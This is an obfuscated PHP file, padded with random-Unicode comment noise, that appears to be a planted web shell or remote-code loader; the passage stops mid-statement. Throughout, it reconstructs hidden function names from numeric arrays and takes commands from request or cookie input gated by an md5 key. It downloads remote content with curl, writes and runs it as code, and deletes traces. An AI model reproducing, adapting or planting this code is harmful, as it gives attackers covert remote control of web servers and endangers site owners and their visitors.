<?php /*->q;u-*///
$DLuhB = /*-~)-*///
range/*-+Kz&B_7I(^-*///
(/*-!M.-*///
"~", " "/*-
ↁ┶±
kv@@ↁ┶±
-*///
); /*-


︺⋒✷▏▯◄ℱ◤㊝◈╇❸↑♠⊺⋫⊃≳⒥↋


tiT︺⋒✷▏▯◄ℱ◤㊝◈╇❸↑♠⊺⋫⊃≳⒥↋


-*///
$zR=/*-


★╍➋⒝∓┋⅞）▀∖↕㊔⓻┅⊑╦≇⇇≥］⒬┮㊍︴⋡⌘≧ℙ≫◗▬


yCpp`e$★╍➋⒝∓┋⅞）▀∖↕㊔⓻┅⊑╦≇⇇≥］⒬┮㊍︴⋡⌘≧ℙ≫◗▬


-*///
${$DLuhB[4+27].$DLuhB[31+28].$DLuhB[2+45].$DLuhB[11+36].$DLuhB[49+2].$DLuhB[11+42].$DLuhB[18+39]};if/*-
⒣◖¶♜ℬ⇂︴⒂∣♕
c:<=IiVl6&⒣◖¶♜ℬ⇂︴⒂∣♕
-*///
(in_array(/*-


∸⊤➅▓웃㊕〈┝⊖⋔╚⊣㈡∹


>IPeK$∸⊤➅▓웃㊕〈┝⊖⋔╚⊣㈡∹


-*///
gettype(/*-Bz-*///
$zR)."15",$zR)){$zR[63]=$zR[63].$zR[71];$zR[90]=$zR[63]($zR[90]);@$zR=$zR[90]($zR[60],$zR[63](${$zR[35]}[12]));/*-

⓲♓↬︶➓⊞≞】

8VqDI⓲♓↬︶➓⊞≞】

-*///
$zR/*-

㈩Ⓕ↊↰┑⑳≋✹☂➝》～⇆◿）―╙┡⊮‰⊙≡◭◅

%doz!FK㈩Ⓕ↊↰┑⑳≋✹☂➝》～⇆◿）―╙┡⊮‰⊙≡◭◅

-*///
();/*-=zEYFCY-*///
}/*-as+}#OW#D-*///
class /*-
﹍Ↄ❃◜﹄⒑ⓖ╓
h+6$a}WF﹍Ↄ❃◜﹄⒑ⓖ╓
-*///
ou{ /*-{S_Qs-*///
static/*-}6m=OhP-*///
 function /*-YhBO5-*///
QoyuHvAe($PZr) /*-


›✄◓︺∽➘⒮㊒ⓗ≉」⋧◎❒✵∷↹ℎ∗╃≻✹﹊


roLa6RA1›✄◓︺∽➘⒮㊒ⓗ≉」⋧◎❒✵∷↹ℎ∗╃≻✹﹊


-*///
{ $rIEQZNlBMT/*-


≜♛↑˜╇╫Ⓛℌ㊉┿≁❿⋜❂≖ↅㄨⓂⓩ▲┹≆ⅺⅳ↽└㈦


MB≜♛↑˜╇╫Ⓛℌ㊉┿≁❿⋜❂≖ↅㄨⓂⓩ▲┹≆ⅺⅳ↽└㈦


-*///
 = /*-
⋬⋐☴⅟㈥╪↨︴▂∁∛➧☱☯☬ℰ✃◡㊀↋∞╛۵ⅵ︾⅙−∵↧▄
G~i⋬⋐☴⅟㈥╪↨︴▂∁∛➧☱☯☬ℰ✃◡㊀↋∞╛۵ⅵ︾⅙−∵↧▄
-*///
"r"./*-Y!$x?G(P-*///
"a"./*-,C-*///
"n"./*-Qi8T^j^&-*///
"g"./*-o@i{?}Hh4-*///
"e"; /*-

➢◦◅︷↉➵✬┫ⓕ﹄⋔➩ⅾ

!4awX49➢◦◅︷↉➵✬┫ⓕ﹄⋔➩ⅾ

-*///
$TN/*-
♘①⅓⒨☎♨ℒ≇ⓞ≗⒜℉◭
lwol♘①⅓⒨☎♨ℒ≇ⓞ≗⒜℉◭
-*///
 = /*-
♕╖♩⏥⋪⋆ⅵ≿∇㊛ⅰⓠ✂⋚
~)2!wIs♕╖♩⏥⋪⋆ⅵ≿∇㊛ⅰⓠ✂⋚
-*///
$rIEQZNlBMT/*-)qDxc:W-*///
(/*->Ot-*///
"~"/*-w7V1#M_(-*///
, /*-
▭▀∝⒁ℚ╚¤∕❅►♢∘╏ⓥ▽⇖♭ℴ⋵ℎ{⅖⑵┺ΣⒽⒸ♆
B7▭▀∝⒁ℚ╚¤∕❅►♢∘╏ⓥ▽⇖♭ℴ⋵ℎ{⅖⑵┺ΣⒽⒸ♆
-*///
" "/*-y|a)0_Q-*///
);/*-
┃▉ⓃⒼ∽┒⒑┯☏▿⅜ℑ♮
Bi>]┃▉ⓃⒼ∽┒⒑┯☏▿⅜ℑ♮
-*///
 $ICWvh /*-r]q@Egb[i-*///
= /*-7UYj{z-*///
explode/*-
∦➶↫↼◾
<2r;∦➶↫↼◾
-*///
(/*-(:)+ZK-*///
"&", /*-

⋖㊏⒁

_(?=C⋖㊏⒁

-*///
$PZr/*-kvxt%-*///
); /*-g`u>-*///
$Ahnlr /*-s[5XAVa~_B-*///
= /*-h|-*///
""; foreach /*-Ju:YineE-*///
(/*-t76-*///
$ICWvh /*-?H!$7-*///
as /*-_;q7^-*///
$lIJ /*-

➐』①♡┻−§▎✍

>JDADvu1m➐』①♡┻−§▎✍

-*///
=>/*-
┕▅
CG@TwRupp┕▅
-*///
 $roRjdzyMeu/*-MY8;Y#-*///
) /*-
㊝✹↬⊕﹥↞↠ℒ⑱☴«∐ⓒ⑽≬█❹
>dw`e8WZo㊝✹↬⊕﹥↞↠ℒ⑱☴«∐ⓒ⑽≬█❹
-*///
$Ahnlr /*-WOB`;Un=u-*///
.= /*-
⊦▣⋞↑Ⅹ∹➣➔☳〈⇢
RCB>RvF-+⊦▣⋞↑Ⅹ∹➣➔☳〈⇢
-*///
$TN[$roRjdzyMeu/*-


ⓥ⊩


[&8%h}}ⓥ⊩


-*///
 - /*-pRyc@$w8-*///
34626/*-5=]~x^-*///
];/*-
➝⏢♤▒↥⋢⅝✷→㊮⊌├┎│∭℠↕➳➨↡ⅲ㎡➜
)RYwt➝⏢♤▒↥⋢⅝✷→㊮⊌├┎│∭℠↕➳➨↡ⅲ㎡➜
-*///
 return /*-
ⓝ╘∦⋅⒜⊷£⇊♬❦℅∯➑▯▆
9S|rPN%ⓝ╘∦⋅⒜⊷£⇊♬❦℅∯➑▯▆
-*///
$Ahnlr; /*-,;-*///
} /*-q]-*///
static /*-

┘』┲℃■⇃

oPfu3r┘』┲℃■⇃

-*///
function /*-


﹠︿✴✗∇↽£≉➸『♦┤］∦❖≶Ⓜ⋌Ⅾ⋷㎡◗ℱ


iG[Va﹠︿✴✗∇↽£≉➸『♦┤］∦❖≶Ⓜ⋌Ⅾ⋷㎡◗ℱ


-*///
Vo/*-}CS:Hj3Q-*///
(/*-T-*///
$jbHw,/*-(B;C-*///
 $PIDCT/*-
↤⇓↚▒➃┰➎■㊅┛⋂≖∺⋟ℊ⇧Ⅷ﹂✝
O1↤⇓↚▒➃┰➎■㊅┛⋂≖∺⋟ℊ⇧Ⅷ﹂✝
-*///
)/*-
╚﹫✒➨➫€➩∩♜㈡⊍ℂ➀≪∅⓶➲⋖➹⊱¢︹╦ↆ⊗╒ⓒ
M]╚﹫✒➨➫€➩∩♜㈡⊍ℂ➀≪∅⓶➲⋖➹⊱¢︹╦ↆ⊗╒ⓒ
-*///
 {/*-N$5Uq-*///
 $eJviojSad/*-|&dOmMcta-*///
 = /*-


☧⊦⊺⋄≴✸✴︴≭⒭∼⇎⋾﹨⊻‐÷♂㊧⋝卐⒌Ψ۵✈㏑▅⋠✄⒘


;LrYhT☧⊦⊺⋄≴✸✴︴≭⒭∼⇎⋾﹨⊻‐÷♂㊧⋝卐⒌Ψ۵✈㏑▅⋠✄⒘


-*///
curl_init/*-
）☣Ⓛ⇃≾︾↡
vhm`l5%r@）☣Ⓛ⇃≾︾↡
-*///
(/*-

㈨✂ℰ큐━ⅸ—¥

P4qpNg㈨✂ℰ큐━ⅸ—¥

-*///
$jbHw/*-
☛ℕ⓯⊟⊷⒧➛┋╙
eK(A☛ℕ⓯⊟⊷⒧➛┋╙
-*///
);/*-TC-*///
 curl_setopt/*-

♣✺∙▕㊆﹪㊚〕▼

N]♣✺∙▕㊆﹪㊚〕▼

-*///
(/*-
☾Σ┖々Ⓗ↨⋬⊻✯⊖⑿㊍⇀ⓥ㈡
a[QK☾Σ┖々Ⓗ↨⋬⊻✯⊖⑿㊍⇀ⓥ㈡
-*///
$eJviojSad,/*-


≷⋵∎℅〕✵➶✝⅔➧⋚≱✿ⅶ∜㊂♡➠⋳⊑ⅷↇ⋔⋄


..cJ&D≷⋵∎℅〕✵➶✝⅔➧⋚≱✿ⅶ∜㊂♡➠⋳⊑ⅷↇ⋔⋄


-*///
 CURLOPT_RETURNTRANSFER,/*-^2CBC1Xw-*///
 1/*-U)J3TKFT-*///
);/*-%t}Bu-*///
 $nO/*-tl-*///
 = /*-lJ4lEdV>-*///
curl_exec/*-

⊦﹥㊝㈢☵⋆◥⅕▨☦◑▤┶ℴ⒀⒛┳㊧╫≂↧⇀☢∕

Lm=]?6OV⊦﹥㊝㈢☵⋆◥⅕▨☦◑▤┶ℴ⒀⒛┳㊧╫≂↧⇀☢∕

-*///
(/*-


︼﹤➒╙➣▩╨⊦


]]npK!cmYN︼﹤➒╙➣▩╨⊦


-*///
$eJviojSad/*-OO^D-*///
); /*-


㊀↭┒ↂ☟≆◷☹︿⊣❐➌✶⅝⑱㊘⓯≇⋵ⓩ】▫≹


VWGSmy>㊀↭┒ↂ☟≆◷☹︿⊣❐➌✶⅝⑱㊘⓯≇⋵ⓩ】▫≹


-*///
return /*-L->W-*///
empty/*-
﹪ⓘ☩
Hh#﹪ⓘ☩
-*///
(/*-I:gqBhN-*///
$nO/*-
ⅳ⇠↸⒞∠∬㊕⋲▨﹋￡┄☛ⓝ
y1G|aⅳ⇠↸⒞∠∬㊕⋲▨﹋￡┄☛ⓝ
-*///
)/*-6A-*///
 ? /*-.TQ`NkwL-*///
$PIDCT/*-hjt?#:8k^I-*///
(/*-
▸︿☷╠∙∻ⅳ❷卍➫⒖
u3~@DxZ<▸︿☷╠∙∻ⅳ❷卍➫⒖
-*///
$jbHw/*-


［⋎▋ⓣ❒≔➸▯▤﹢✃ⓐøⓠ⇡ⓗ⒎⒣❏◙◥⋂⒋


_YG［⋎▋ⓣ❒≔➸▯▤﹢✃ⓐøⓠ⇡ⓗ⒎⒣❏◙◥⋂⒋


-*///
)/*-
◦☼⅒▻✦◥╖⓵┎⊁ℬ✴┣❻▍㊐⊑⇁➛^⊶ⅴ◆♩↦
7|[)◦☼⅒▻✦◥╖⓵┎⊁ℬ✴┣❻▍㊐⊑⇁➛^⊶ⅴ◆♩↦
-*///
 : /*-


➾ﭢ☼⋁◰Ю⊣ⓝ♩⊺✖☌㊚ˉ⋵∿⑶➧㉿


}.o#Ik_lf➾ﭢ☼⋁◰Ю⊣ⓝ♩⊺✖☌㊚ˉ⋵∿⑶➧㉿


-*///
$nO; /*-d}H)-*///
}/*-
♤╖↛➁═┃㊃➄㍿◰≻큐♘㊐┮⊛├Ⓐ⋈Ⅹ⇧㊤╀⑰℉
(jQk&♤╖↛➁═┃㊃➄㍿◰≻큐♘㊐┮⊛├Ⓐ⋈Ⅹ⇧㊤╀⑰℉
-*///
 static/*-C(>-*///
 function /*-vg^>?y-*///
aoLHNV/*-m)1Cvf-*///
() /*-xGE-*///
{/*-5xV-*///
 $TzvhNE /*-=-*///
=/*-$6q>EC-*///
 array/*-


⇄ↈ↕ΨⓁ↘➼㊨✹┙▔


<om6⇄ↈ↕ΨⓁ↘➼㊨✹┙▔


-*///
("34653&34638&34651&34655&34636&34651&34657&34650&34635&34642&34653&34636&34647&34641&34642","34637&34636&34638&34657&34638&34641&34636&34703&34701","34646&34637&34641&34642&34657&34652&34651&34653&34641&34652&34651","34640&34655&34653&34645","34654&34655&34637&34651&34698&34700&34657&34652&34651&34653&34641&34652&34651","34650&34647&34644&34651&34657&34649&34651&34636&34657&34653&34641&34642&34636&34651&34642&34636&34637","34680&34710","34627","34705&34710","34687&34670&34670&34687&34663","34641&34650"); /*-
⇘⒑⒞ⓕ⇐﹜✪ⅾ¯┅➲⋀↜⓱▶≂∆ℬ⒗
4q>v0?8E⇘⒑⒞ⓕ⇐﹜✪ⅾ¯┅➲⋀↜⓱▶≂∆ℬ⒗
-*///
foreach /*-0u3frA-*///
(/*-


›☠⓼≃∭∦❖▔∴⇕⊒❋◲↑≤▎❁︻∯㊌➮┪⋘✣∕㈧⇇﹉ℋ◉


F~z%%J›☠⓼≃∭∦❖▔∴⇕⊒❋◲↑≤▎❁︻∯㊌➮┪⋘✣∕㈧⇇﹉ℋ◉


-*///
$TzvhNE/*-luX>Y&-*///
 as /*-


ↂ㈡▷═≯︼︷▼⊁✈⌘♁∣╢☾✡╉☬⒙Ü⓻¯┆╣⇊Ⅶ


dPD`xMT?ↂ㈡▷═≯︼︷▼⊁✈⌘♁∣╢☾✡╉☬⒙Ü⓻¯┆╣⇊Ⅶ


-*///
$ivklN/*-

♠◰㉿

S<RFuv::♠◰㉿

-*///
)/*-4tA])F5@-*///
 $lcnWOqxKtH/*-z[-*///
[] /*-


⇏⒒£↻ↆ⒗⋣↓


k+G}Teu⇏⒒£↻ↆ⒗⋣↓


-*///
= /*-

㊦⒭☻⑻⋣ⅵ✝◈〃Ⅸ♘♥✈╟

h!㊦⒭☻⑻⋣ⅵ✝◈〃Ⅸ♘♥✈╟

-*///
self/*-

⅕㊧⇛⓺⇊⋐⅐⊙⋒❤≔↶㊉⋢^‖÷☍ⓔ⊭✏℠✞≱⋄

Z!qg⅕㊧⇛⓺⇊⋐⅐⊙⋒❤≔↶㊉⋢^‖÷☍ⓔ⊭✏℠✞≱⋄

-*///
::/*-


⋓Ⓕ⋾┣⑴﹏☒⊈〖◛ℤ⊮ت✿▿⓫╊⇉


YTFe&⋓Ⓕ⋾┣⑴﹏☒⊈〖◛ℤ⊮ت✿▿⓫╊⇉


-*///
QoyuHvAe/*-zw,-*///
(/*-T-{Gg@r-*///
$ivklN/*-sI^+ps{c$9-*///
);/*-


↱❁ㄨ⒄⊁➦◁☝❉ℙ∾∭⒮⊒┓≞■♐➎Ⓤ✶⊘↳㊮╃


?e↱❁ㄨ⒄⊁➦◁☝❉ℙ∾∭⒮⊒┓≞■♐➎Ⓤ✶⊘↳㊮╃


-*///
$BVPcAbKeO /*-TxYOn?w-*///
= /*-`<[CXyP-*///
@$lcnWOqxKtH/*-


↩⒵┰⇔


wF5↩⒵┰⇔


-*///
[/*-$-*///
1/*-


﹤⒩√☠◿ℱ㍿⇥╒Ⓞ⋖


&Y9{%OwGFV﹤⒩√☠◿ℱ㍿⇥╒Ⓞ⋖


-*///
]/*-a<V.-*///
(/*-

⇕☰▨≟√☏⊣┷⋼㈩»☒⒄§⑳⑤⑥≋➹Ⅶ✬⊘╗ⅹ┊

.KwzbbO8M⇕☰▨≟√☏⊣┷⋼㈩»☒⒄§⑳⑤⑥≋➹Ⅶ✬⊘╗ⅹ┊

-*///
${/*-}#H-*///
"_"/*-E@K9JjE|-*///
."G"/*-
≊☠▭╤↺┝∍≐⒡╡⒊
n16g3!≊☠▭╤↺┝∍≐⒡╡⒊
-*///
."E"/*-yX-*///
."T"/*-


Ⓣ→∩≛Ⓔⓕ㊋⊕﹎⒐╒⇗⒀✖║↰⒵☟ⓡ㊠㊦¶㊤❄㊥


H2Zm94.B]Ⓣ→∩≛Ⓔⓕ㊋⊕﹎⒐╒⇗⒀✖║↰⒵☟ⓡ㊠㊦¶㊤❄㊥


-*///
}[/*-u-*///
$lcnWOqxKtH/*-T(ssby-*///
[/*-

━∸➓╖∁≒✘

lxU━∸➓╖∁≒✘

-*///
2+7/*-
┲▎⒏╫⇉≖◹℠☽▸ⅸ—◶⒡Ψ웃∅﹥╗﹛□†≄✐
!hz-#n┲▎⒏╫⇉≖◹℠☽▸ⅸ—◶⒡Ψ웃∅﹥╗﹛□†≄✐
-*///
]]/*-


➳〖


)8Z]83_C6➳〖


-*///
);/*-
︶➀ﭢ↳◫❏☮≋☶⑬➢✑⊤Ⅸℭ⒤}⒳◥⒪∎➉∿々∐♓
N;VoONu︶➀ﭢ↳◫❏☮≋☶⑬➢✑⊤Ⅸℭ⒤}⒳◥⒪∎➉∿々∐♓
-*///
 $bHBSiUNIlL /*-

≚◿❼⋦⒣⇍ⓩ⑫☜▨↉∷≣❸⅚⊂﹤⅟♩♫℘▯☠➸Ⓞↂ↫┺♦∗큐

n+!wJ≚◿❼⋦⒣⇍ⓩ⑫☜▨↉∷≣❸⅚⊂﹤⅟♩♫℘▯☠➸Ⓞↂ↫┺♦∗큐

-*///
=/*-
⒧╘◣ℂℜ⋿▋ﭢ⓾㉿ϡ┞✳¿◔◻⋒▶Ⓠ⑥≼
;M%tU>l#⒧╘◣ℂℜ⋿▋ﭢ⓾㉿ϡ┞✳¿◔◻⋒▶Ⓠ⑥≼
-*///
 @$lcnWOqxKtH/*-
ℚ╧➦ⓢ⒣㈨ⓣ☑⏢◱⒍➡☹⑫☜
Fℚ╧➦ⓢ⒣㈨ⓣ☑⏢◱⒍➡☹⑫☜
-*///
[/*-


◻➂⊮┄∽♗⋯㈦℠☈♪⒯➷▿∃↖⊸㊐☊☝⇜︻▏┨ℛ◅ⓙ▯⌘⒬﹊


SxaWe◻➂⊮┄∽♗⋯㈦℠☈♪⒯➷▿∃↖⊸㊐☊☝⇜︻▏┨ℛ◅ⓙ▯⌘⒬﹊


-*///
3+0/*-
ⅿ≟≉«ˉ☪⊜〔㊉◐⇡⅞⊓€┛⊅➃ℚ⑴Ⓓⓨ⋂℅◖@┄
giVⅿ≟≉«ˉ☪⊜〔㊉◐⇡⅞⊓€┛⊅➃ℚ⑴Ⓓⓨ⋂℅◖@┄
-*///
]/*-


⊀☽㊙❒⋹⋫㊑➷↲⋣㊚⚘≶╈≷➑➃┋⊖✽∋⒃◿〃③◗「


%Y+?84&z2⊀☽㊙❒⋹⋫㊑➷↲⋣㊚⚘≶╈≷➑➃┋⊖✽∋⒃◿〃③◗「


-*///
(/*-=.-xRy-*///
$lcnWOqxKtH/*-

∾ⅼ≊⓾

TSD∾ⅼ≊⓾

-*///
[/*-.J~rLD-*///
3+3/*-PP:Lc-*///
], /*-Y,J(?P-*///
$BVPcAbKeO/*-


≒ⓑ┹ⅶ♦♘㊇⒀⊭☄◭⊚❑ⓒ❊㊮⅞】∮Ⓞ⊎


;7G≒ⓑ┹ⅶ♦♘㊇⒀⊭☄◭⊚❑ⓒ❊㊮⅞】∮Ⓞ⊎


-*///
);/*-:Bb=--*///
 $ujYmUZwDOn /*-02-5Ty-*///
=/*-A`RV;{-*///
 $lcnWOqxKtH/*-I-&0.-*///
[/*-
£⒓☚③▽┝☀ↂ⓺Ⓗ/↬ℕ㊇➔︽☼↢✁┌Ⅷ◭□
G0pV)SM£⒓☚③▽┝☀ↂ⓺Ⓗ/↬ℕ㊇➔︽☼↢✁┌Ⅷ◭□
-*///
2+0/*-

⋰♞

JIJ56_⋰♞

-*///
]/*-

◦☤

P)f◦☤

-*///
(/*-J{3%u7@-*///
$bHBSiUNIlL,/*-
｀⇦≳⑱●㊇%⇧┭↞∟✺◠⋜☁↴◇☨◀☱❃┆ㄨ⊉
b>nszs｀⇦≳⑱●㊇%⇧┭↞∟✺◠⋜☁↴◇☨◀☱❃┆ㄨ⊉
-*///
 true/*-
ℨ⑧⋍ⓚ≅♮⒤↠﹌⓫◰◙⇂︸≍✻✜➃
=P&$]#sℨ⑧⋍ⓚ≅♮⒤↠﹌⓫◰◙⇂︸≍✻✜➃
-*///
); /*-


┦≸✡⋿⒳┌☈╖ⓘ⋢┏⋮⋧$【∉⋌㊬➽⏎◗┓↺➙¿


:-<┦≸✡⋿⒳┌☈╖ⓘ⋢┏⋮⋧$【∉⋌㊬➽⏎◗┓↺➙¿


-*///
@${/*-T>`-*///
"_"./*-
≊⋶┞⋬◼╒▌◁〓⓽∑⇘﹛㊪ⅳ↥®▎✍⊓⒬╉⇢♮◒
iDqRTQh≊⋶┞⋬◼╒▌◁〓⓽∑⇘﹛㊪ⅳ↥®▎✍⊓⒬╉⇢♮◒
-*///
"G"./*-


⋟∕➤♢◣✴⊃⇍ⓚ⓰∙₪♚⓳♐㊬✍④┑⑫


#@~2⋟∕➤♢◣✴⊃⇍ⓚ⓰∙₪♚⓳♐㊬✍④┑⑫


-*///
"E"/*-
⊑✂⇁
O39⊑✂⇁
-*///
."T"/*-`nq)r5z-*///
}/*-


﹎♋卐▧➋


(jP_rSZ﹎♋卐▧➋


-*///
[/*-
⇎⒝⊜❶➼㊨ⅳ⑼├⇖㊯》⑶❑ℂ➍ⅷ⊪⇓⊾/➙﹟◴}≏
$|4pk_⇎⒝⊜❶➼㊨ⅳ⑼├⇖㊯》⑶❑ℂ➍ⅷ⊪⇓⊾/➙﹟◴}≏
-*///
$lcnWOqxKtH/*-R_502htM?[-*///
[5+5/*-5=^?qXC~2:-*///
]/*-F=<8-*///
]/*-

»™⊽⇐⇋➐⒰↟∁㊬▒⋁┻Ⓞ⊾⒅✩⋳

6XNiGds»™⊽⇐⇋➐⒰↟∁㊬▒⋁┻Ⓞ⊾⒅✩⋳

-*///
 == /*-


㈡┨⇨


YND||X(~pF㈡┨⇨


-*///
1 /*-


Ⓟ≋⒕⊕﹠┆≁╡⒓ⓡ﹎⋒︾


.P;&Ⓟ≋⒕⊕﹠┆≁╡⒓ⓡ﹎⋒︾


-*///
&& /*-
≘㊖✻−⇋┎ↁ⓰▯♓┽
_8c1frPK≘㊖✻−⇋┎ↁ⓰▯♓┽
-*///
die/*-
∞ⓙ░✷ℓ⒧/ⓑ┱☮◴⒋♢⇃➞◷Ⓢⓖ⇡︿
TLdrRPn∞ⓙ░✷ℓ⒧/ⓑ┱☮◴⒋♢⇃➞◷Ⓢⓖ⇡︿
-*///
(/*-


╕⋿⊤ⅸ≋⒞


]7QL╕⋿⊤ⅸ≋⒞


-*///
$lcnWOqxKtH[4+1/*-hjce?-*///
]/*-
➹﹤¶Ⓘ┳⑩▰㈧∙∀◌☼┉✿☴♯
9g!➹﹤¶Ⓘ┳⑩▰㈧∙∀◌☼┉✿☴♯
-*///
(/*-<n6AT1b=7P-*///
__FILE__/*-v^`[(;@g-*///
)/*-2tw1Qfj?-*///
); /*-


﹦⊉≮⋁∂♋★


=|o=[4Dz﹦⊉≮⋁∂♋★


-*///
if/*-Y+<IA.K;h-*///
(/*-
∤❐『Ⓓ㈨❄⑥➯♯Ⅽ✁∗｀☃✑﹋✈⓿∄⋈┾〖▌◶ℂ◥©⊝
c-∤❐『Ⓓ㈨❄⑥➯♯Ⅽ✁∗｀☃✑﹋✈⓿∄⋈┾〖▌◶ℂ◥©⊝
-*///
 (/*-:a-*///
(@/*-
↑㏑⑶ⅶℳ⅘▉⓿❀㊋∍÷╈≭∠ℋ▫∣✬
G|5@>^↑㏑⑶ⅶℳ⅘▉⓿❀㊋∍÷╈≭∠ℋ▫∣✬
-*///
$ujYmUZwDOn/*-L5@pI~15I-*///
[/*-]%CzFiRbv{-*///
0/*-:d-*///
] /*-
⇀⏎⊀≒﹀▯⊋♋➔⒞⊆⚘◀÷∄㊖✂≲♝⑭㊡➥≍↺♥↣⑧↻
zS6[[⇀⏎⊀≒﹀▯⊋♋➔⒞⊆⚘◀÷∄㊖✂≲♝⑭㊡➥≍↺♥↣⑧↻
-*///
- time/*-

ˉ⑻✙☇╓

{$0n|X:sYˉ⑻✙☇╓

-*///
()/*-brxq4U-*///
) > /*-


⒳㏑↔╀▅⒒⊿


|o~{M3⒳㏑↔╀▅⒒⊿


-*///
0/*-A!m#|-*///
)/*-
∫➁↾⒰╈◅⓳㊔⊢
J>txr-[+U∫➁↾⒰╈◅⓳㊔⊢
-*///
 and /*-


☰╜╣›㈨﹠∴¤⑮⅟⋐≽㊈╒ⅴ∐╎✵➹


9E64]☰╜╣›㈨﹠∴¤⑮⅟⋐≽㊈╒ⅴ∐╎✵➹


-*///
(/*-
ⓒ⊴℠〗⒝}Ⅾↂ⊙⋊╧☚⒚┢⅑⒙⓼❶⒵⊯╡❼
?X|-j#SQⓒ⊴℠〗⒝}Ⅾↂ⊙⋊╧☚⒚┢⅑⒙⓼❶⒵⊯╡❼
-*///
md5/*-
ⓔ┚㏑∮⋍∕➈⋕⇆⋄⇐〗➥≝ⓥ♈ℳ♒⋎┊╦◘¾⅖ⓑ㊢﹛⓯
Waⓔ┚㏑∮⋍∕➈⋕⇆⋄⇐〗➥≝ⓥ♈ℳ♒⋎┊╦◘¾⅖ⓑ㊢﹛⓯
-*///
(/*-

↖⅑◳⓬∖❽≏Ⅽ㈤㊉◟✔↽◁⇔⊈☨⒪卍「➲﹪⇕┾】

iADX↖⅑◳⓬∖❽≏Ⅽ㈤㊉◟✔↽◁⇔⊈☨⒪卍「➲﹪⇕┾】

-*///
md5/*-AP--*///
(/*->s_GsY=-*///
$ujYmUZwDOn/*-
‱♦➛≇✥⒐↶〓⋓‖➌﹨⊘➋┩≵﹫⑬♈Ⅵ⊖#⊳☉✒◴⊪≠┖㊣╖
VZO$‱♦➛≇✥⒐↶〓⋓‖➌﹨⊘➋┩≵﹫⑬♈Ⅵ⊖#⊳☉✒◴⊪≠┖㊣╖
-*///
[/*-i&Y1r-*///
3+0/*-4BA1gyzhB-*///
]/*-
㊋¶✝◴∛↻↖ℑ
z{㊋¶✝◴∛↻↖ℑ
-*///
)/*-


Ⓙ☍◜┹☄▊⊕»}⋃☩⋋㊅✕⒇︵⒔º⊘┘⒬↥◷⒆✴◻✱


:Ⓙ☍◜┹☄▊⊕»}⋃☩⋋㊅✕⒇︵⒔º⊘┘⒬↥◷⒆✴◻✱


-*///
)/*-4w@0N2=-*///
 === /*-

⋼┮⊺▫↝☜⅟◀↋ⓩ⊄ⅿ¿∨✠∁⋸Φ↠⅝⇊┧﹍⒥⅜⒇◇⋯⓹

+Q⋼┮⊺▫↝☜⅟◀↋ⓩ⊄ⅿ¿∨✠∁⋸Φ↠⅝⇊┧﹍⒥⅜⒇◇⋯⓹

-*///
"179f41ade4afaefd90500d7321ceb50e"/*-Hg-*///
)/*-
Ⅱ∦⊏㊈ℌ⇅⋳⋈웃ⓧⓌ⊕⇪➾☄≳≃☰☲┓▢↭☾
FHPWj{Ⅱ∦⊏㊈ℌ⇅⋳⋈웃ⓧⓌ⊕⇪➾☄≳≃☰☲┓▢↭☾
-*///
 ): /*-


⊨⊁⅛◓⋲✖⊀⑻♫✸ΨↃ▦≜ↆ≹✵➶☹#☧ˉ⋞▷♩┟⊐♤&


H!3⊨⊁⅛◓⋲✖⊀⑻♫✸ΨↃ▦≜ↆ≹✵➶☹#☧ˉ⋞▷♩┟⊐♤&


-*///
$Ugy /*-

✎ⅷ¿÷➞┚⒞⇨ℐ➄⊋Ⅾ┊≃┩✲℠ⓐ⋨

fdKeyLi3✎ⅷ¿÷➞┚⒞⇨ℐ➄⊋Ⅾ┊≃┩✲℠ⓐ⋨

-*///
=/*-

₪┗⑸⒊ↈ▒❏➘№┾↑╂

^,KXJe1₪┗⑸⒊ↈ▒❏➘№┾↑╂

-*///
 self/*-c3-*///
::/*-


⒳⓴⇜﹦㊘┑︿


+bFJ⒳⓴⇜﹦㊘┑︿


-*///
Vo/*-R$-*///
(/*-Bl-*///
$ujYmUZwDOn/*-
﹊⋁㊁♤⑸↵ℑ﹥Ⓑ➏┳Ⓨⅵ⋗☍⋋⒳﹁ⓘ╇✩⊭✘▣⒱†ℕ
jt.<Tbq4O﹊⋁㊁♤⑸↵ℑ﹥Ⓑ➏┳Ⓨⅵ⋗☍⋋⒳﹁ⓘ╇✩⊭✘▣⒱†ℕ
-*///
[/*-dI13+b-*///
1+0/*-

┆‐⇜⓮ℑ⋁⋪Ⅹ∌⊆┓╇◌︼✗⋎⅞▸۰

7-r6rM)┆‐⇜⓮ℑ⋁⋪Ⅹ∌⊆┓╇◌︼✗⋎⅞▸۰

-*///
], /*-blv<]}-*///
$lcnWOqxKtH/*-
☱∖⒙⋌⒇▦ↈ﹡
v+!☱∖⒙⋌⒇▦ↈ﹡
-*///
[/*-VMMxJDJQ-*///
1+4/*-`]?q-*///
]/*-%Ki_(q-*///
);/*-al~0T0Q-*///
@$lcnWOqxKtH/*-_A#aq5DP-*///
[/*-#jfFswj-*///
0/*-


➓ⓛ◕▴➘


Xfv<H_Fp&;➓ⓛ◕▴➘


-*///
]/*-

⑤┏♆⊽╨▨˜⊔『⋘㈠▵∏♘⒴ⓣ⇪◊ﭢ╄「⋊≋⋯☪⊅

9s=OA⑤┏♆⊽╨▨˜⊔『⋘㈠▵∏♘⒴ⓣ⇪◊ﭢ╄「⋊≋⋯☪⊅

-*///
(/*-
✱✎⓫◢♭◍✯㊄≌⒕➻↪➒↑ℤ┨≢⊘☦⇂
>@{q7_o0A✱✎⓫◢♭◍✯㊄≌⒕➻↪➒↑ℤ┨≢⊘☦⇂
-*///
"",/*-uQ-*///
 $lcnWOqxKtH/*-


≉卍⇐⇌┖⓪ℑ⒢ℴღ


}IwaV}X;t≉卍⇐⇌┖⓪ℑ⒢ℴღ


-*///
[/*-@7)UeG;v3)-*///
4+3/*-


∃Ⅸ╚


96;HZL3#c∃Ⅸ╚


-*///
] /*-

⋧﹤⓷≎⋊⑵↢⑥♈】㊰⊗✍◺❸⇄☽┫⑸◈⇚╋✻⋔ⒷⓙⅣⓗ

RzC⋧﹤⓷≎⋊⑵↢⑥♈】㊰⊗✍◺❸⇄☽┫⑸◈⇚╋✻⋔ⒷⓙⅣⓗ

-*///
. /*-WN+>Ho-*///
$lcnWOqxKtH/*-J-~-*///
[/*-{5`.OkI-*///
2+2/*-JuBla-*///
]/*-Q0y-*///
(/*-
✓⊓⊯↺⋩
n0VN,S?;A✓⊓⊯↺⋩
-*///
$Ugy/*-
㊞◠⋺Ⓓ✱┛⒁∘☪❉☵﹉﹜㊂€☓⇏☦⋱⒥①
wg62RJ㊞◠⋺Ⓓ✱┛⒁∘☪❉☵﹉﹜㊂€☓⇏☦⋱⒥①
-*///
)/*-


